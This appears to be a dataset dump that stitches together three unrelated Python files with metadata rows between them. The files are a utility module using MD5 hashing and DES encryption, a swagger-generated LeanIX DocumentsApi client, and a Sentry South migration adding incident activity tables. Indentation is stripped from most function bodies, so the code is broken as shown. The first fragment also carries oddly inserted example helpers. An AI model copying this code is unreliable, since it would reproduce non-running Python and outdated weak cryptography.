if isinstance(d, (unicode, ObjectId, datetime)):
return str(d)
elif isinstance(d, (list, tuple)):
return [conv_mongo_object(x) for x in d]
elif isinstance(d, dict):
return dict([(conv_mongo_object(k), conv_mongo_object(v)) for k, v in d.items()])
else:
return d
mongo_conv = conv_mongo_object
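def _conv_example():
    """
        Hedged illustration, not part of the original module: shows the
        str-normalisation performed by conv_mongo_object on a typical result.
    """
    doc = {u"_id": ObjectId("0123456789ab0123456789ab"), u"name": u"demo"}
    return conv_mongo_object(doc)  # {'_id': '0123456789ab0123456789ab', 'name': 'demo'}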
### Hashing and encryption helpers ######################################################################
def hash2(o):
"""
        Hash helper: MD5 hex digest of str(o).
"""
return md5(str(o)).hexdigest()
def encrypt(s, base64 = False):
"""
        Symmetric (DES) encryption; optionally base64-encodes the result.
"""
e = _cipher().encrypt(s)
return base64 and b64encode(e) or e
def decrypt(s, base64 = False):
"""
        Symmetric (DES) decryption; optionally base64-decodes the input first.
"""
return _cipher().decrypt(base64 and b64decode(s) or s)
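def _crypto_example(plaintext="secret"):
    """
        Hedged illustration, not part of the original module: requires pyDes
        to be installed and __conf__.ENCRYPT_KEY to be configured (see the
        try block near the imports).
    """
    token = encrypt(plaintext, base64=True)
    assert decrypt(token, base64=True) == plaintext
    return token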
### Argument-checking helpers ###########################################################################
def not_null(*args):
"""
        Check that no argument is None.
"""
if not all(map(lambda v: v is not None, args)):
raise ValueError("Argument must be not None/Null!")
def not_empty(*args):
"""
        Check that no argument is None/empty/zero.
"""
if not all(args):
raise ValueError("Argument must be not None/Null/Zero/Empty!")
def args_range(min_value, max_value, *args):
"""
        Check that every argument falls within [min_value, max_value].
"""
not_null(*args)
if not all(map(lambda v: min_value <= v <= max_value, args)):
raise ValueError("Argument must be between {0} and {1}!".format(min_value, max_value))
def args_length(min_len, max_len, *args):
"""
        Check that every argument's length falls within [min_len, max_len].
"""
not_null(*args)
if not all(map(lambda v: min_len <= len(v) <= max_len, args)):
raise ValueError("Argument length must be between {0} and {1}!".format(min_len, max_len))
__all__ = ["ROOT_PATH", "app_path", "template_path", "static_path",
"staticclass", "sealedclass", "partialclass",
"get_modules", "get_members",
"conv_mongo_object", "mongo_conv", "set_default_encoding",
"hash2", "encrypt", "decrypt",
"not_null", "not_empty", "args_range", "args_length"]
|
mit
| 6,438,945,186,189,151,000
| 24.227273
| 142
| 0.507799
| false
| 3.233316
| false
| false
| false
|
leanix/leanix-sdk-python
|
src/leanix/DocumentsApi.py
|
1
|
11645
|
#!/usr/bin/env python
"""
The MIT License (MIT)
Copyright (c) 2017 LeanIX GmbH
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
the Software, and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
"""
import sys
import os
from models import *
class DocumentsApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def getDocuments(self, **kwargs):
"""
Read all documents
Args:
relations, bool: If set to true, all relations of the Fact Sheet are fetched as well. Fetching all relations can be slower. Default: false. (optional)
filter, str: Full-text filter (optional)
referenceSystem, str: Reference system filter, e.g. Signavio (optional)
referenceID, str: ReferenceID, e.g. Signavio ID (optional)
factSheetID, str: FactSheetID, e.g. LeanIX ID (optional)
Returns: Array[Document]
"""
allParams = ['relations', 'filter', 'referenceSystem', 'referenceID', 'factSheetID']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDocuments" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('relations' in params):
queryParams['relations'] = self.apiClient.toPathValue(params['relations'])
if ('filter' in params):
queryParams['filter'] = self.apiClient.toPathValue(params['filter'])
if ('referenceSystem' in params):
queryParams['referenceSystem'] = self.apiClient.toPathValue(params['referenceSystem'])
if ('referenceID' in params):
queryParams['referenceID'] = self.apiClient.toPathValue(params['referenceID'])
if ('factSheetID' in params):
queryParams['factSheetID'] = self.apiClient.toPathValue(params['factSheetID'])
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Array[Document]')
return responseObject
def createDocument(self, **kwargs):
"""
Create a new Document
Args:
body, Document: Message-Body (optional)
Returns: Document
"""
allParams = ['body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method createDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'POST'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def getDocument(self, ID, **kwargs):
"""
Read a Document by a given ID
Args:
ID, str: Unique ID (required)
relations, bool: If set to true, all relations of the Fact Sheet are fetched as well. Fetching all relations can be slower. Default: false. (optional)
Returns: Document
"""
allParams = ['ID', 'relations']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('relations' in params):
queryParams['relations'] = self.apiClient.toPathValue(params['relations'])
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def updateDocument(self, ID, **kwargs):
"""
Update a Document by a given ID
Args:
ID, str: Unique ID (required)
body, Document: Message-Body (optional)
Returns: Document
"""
allParams = ['ID', 'body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'Document')
return responseObject
def deleteDocument(self, ID, **kwargs):
"""
Delete a Document by a given ID
Args:
ID, str: Unique ID (required)
Returns:
"""
allParams = ['ID']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteDocument" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
def updateDataObject(self, ID, **kwargs):
"""
Update the data object for the given document ID
Args:
ID, str: Unique ID (required)
body, DataObject: Message-Body (optional)
Returns: DataObject
"""
allParams = ['ID', 'body']
params = locals()
for (key, val) in params['kwargs'].iteritems():
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateDataObject" % key)
params[key] = val
del params['kwargs']
resourcePath = '/documents/{ID}/dataobjects'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
bodyParam = None
if ('ID' in params):
replacement = str(self.apiClient.toPathValue(params['ID']))
resourcePath = resourcePath.replace('{' + 'ID' + '}',
replacement)
if formParams:
headerParams['Content-type'] = 'application/x-www-form-urlencoded'
if ('' in params):
bodyParam = params['']
# postData = (formParams if formParams else bodyParam)
postData = params['body'] if 'body' in params else None
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'DataObject')
return responseObject
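# Hedged usage sketch, not part of the generated client. Assumes an ApiClient
# instance configured elsewhere by the SDK; argument values are illustrative.
def _example_list_documents(apiClient, fact_sheet_id):
    api = DocumentsApi(apiClient)
    # Fetch all documents attached to one Fact Sheet, including relations.
    return api.getDocuments(factSheetID=fact_sheet_id, relations=True)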
|
mit
| -3,196,921,589,828,660,000
| 30.136364
| 162
| 0.575784
| false
| 4.722222
| false
| false
| false
|
mvaled/sentry
|
src/sentry/south_migrations/0480_incidentactivity.py
|
1
|
136910
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
# Flag to indicate if this migration is too risky
# to run online and needs to be coordinated for offline
is_dangerous = False
def forwards(self, orm):
# Adding model 'IncidentActivity'
db.create_table('sentry_incidentactivity', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('incident', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.Incident'])),
('user', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.User'], null=True)),
('type', self.gf('django.db.models.fields.IntegerField')()),
('value', self.gf('django.db.models.fields.TextField')(null=True)),
('previous_value', self.gf('django.db.models.fields.TextField')(null=True)),
('comment', self.gf('django.db.models.fields.TextField')(null=True)),
('event_stats_snapshot', self.gf('sentry.db.models.fields.foreignkey.FlexibleForeignKey')(
to=orm['sentry.TimeSeriesSnapshot'], null=True)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['IncidentActivity'])
# Adding model 'TimeSeriesSnapshot'
db.create_table('sentry_timeseriessnapshot', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('start', self.gf('django.db.models.fields.DateTimeField')()),
('end', self.gf('django.db.models.fields.DateTimeField')()),
('values', self.gf('sentry.db.models.fields.array.ArrayField')(
of=(u'django.db.models.fields.IntegerField', [], {}))),
('period', self.gf('django.db.models.fields.IntegerField')()),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['TimeSeriesSnapshot'])
def backwards(self, orm):
# Deleting model 'IncidentActivity'
db.delete_table('sentry_incidentactivity')
# Deleting model 'TimeSeriesSnapshot'
db.delete_table('sentry_timeseriessnapshot')
models = {
'sentry.activity': {
'Meta': {'unique_together': '()', 'object_name': 'Activity', 'index_together': '()'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.apiapplication': {
'Meta': {'unique_together': '()', 'object_name': 'ApiApplication', 'index_together': '()'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'client_id': ('django.db.models.fields.CharField', [], {'default': "'12bc89ca7374404ea6921393b99c2e83ca9087accd2345a19bc5c5fc3892410a'", 'unique': 'True', 'max_length': '64'}),
'client_secret': ('sentry.db.models.fields.encrypted.EncryptedTextField', [], {'default': "'3b5eb3fdb9a44c908cc9392a5fd7b133e999526dea0d455ea24fc3cd719a22c0'"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Quiet Spaniel'", 'max_length': '64', 'blank': 'True'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'privacy_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
'redirect_uris': ('django.db.models.fields.TextField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'terms_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'sentry.apiauthorization': {
'Meta': {'unique_together': "(('user', 'application'),)", 'object_name': 'ApiAuthorization', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apigrant': {
'Meta': {'unique_together': '()', 'object_name': 'ApiGrant', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']"}),
'code': ('django.db.models.fields.CharField', [], {'default': "'20e6168c01b8433daaf1d95b568cec7e'", 'max_length': '64', 'db_index': 'True'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 5, 16, 0, 0)', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'redirect_uri': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.apikey': {
'Meta': {'unique_together': '()', 'object_name': 'ApiKey', 'index_together': '()'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'key_set'", 'to': "orm['sentry.Organization']"}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.apitoken': {
'Meta': {'unique_together': '()', 'object_name': 'ApiToken', 'index_together': '()'},
'application': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiApplication']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 6, 15, 0, 0)', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'refresh_token': ('django.db.models.fields.CharField', [], {'default': "'1baed9fb48f145d2ac57b013160dc650e4c940d6c5f14789a331cf28b3af7c45'", 'max_length': '64', 'unique': 'True', 'null': 'True'}),
'scope_list': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'token': ('django.db.models.fields.CharField', [], {'default': "'cde3d55c0f444c42acd08de782b5f7fcf3a0c44d35a94cb4b40472b82a437a0d'", 'unique': 'True', 'max_length': '64'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.assistantactivity': {
'Meta': {'unique_together': "(('user', 'guide_id'),)", 'object_name': 'AssistantActivity', 'db_table': "'sentry_assistant_activity'", 'index_together': '()'},
'dismissed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'guide_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'useful': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'viewed_ts': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'unique_together': '()', 'object_name': 'AuditLogEntry', 'index_together': '()'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'audit_actors'", 'null': 'True', 'to': "orm['sentry.User']"}),
'actor_key': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiKey']", 'null': 'True', 'blank': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authenticator': {
'Meta': {'unique_together': "(('user', 'type'),)", 'object_name': 'Authenticator', 'db_table': "'auth_authenticator'", 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'last_used_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity', 'index_together': '()'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'unique_together': '()', 'object_name': 'AuthProvider', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'unique_together': '()', 'object_name': 'Broadcast', 'index_together': '()'},
'cta': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_expires': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2019, 5, 23, 0, 0)', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'upstream_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'})
},
'sentry.broadcastseen': {
'Meta': {'unique_together': "(('broadcast', 'user'),)", 'object_name': 'BroadcastSeen', 'index_together': '()'},
'broadcast': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Broadcast']"}),
'date_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.commit': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'Commit', 'index_together': "(('repository_id', 'date_added'),)"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.commitauthor': {
'Meta': {'unique_together': "(('organization_id', 'email'), ('organization_id', 'external_id'))", 'object_name': 'CommitAuthor', 'index_together': '()'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '164', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.commitfilechange': {
'Meta': {'unique_together': "(('commit', 'filename'),)", 'object_name': 'CommitFileChange', 'index_together': '()'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '1'})
},
'sentry.counter': {
'Meta': {'unique_together': '()', 'object_name': 'Counter', 'db_table': "'sentry_projectcounter'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'value': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.dashboard': {
'Meta': {'unique_together': "(('organization', 'title'),)", 'object_name': 'Dashboard', 'index_together': '()'},
'created_by': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sentry.deletedorganization': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedOrganization', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedproject': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedProject', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
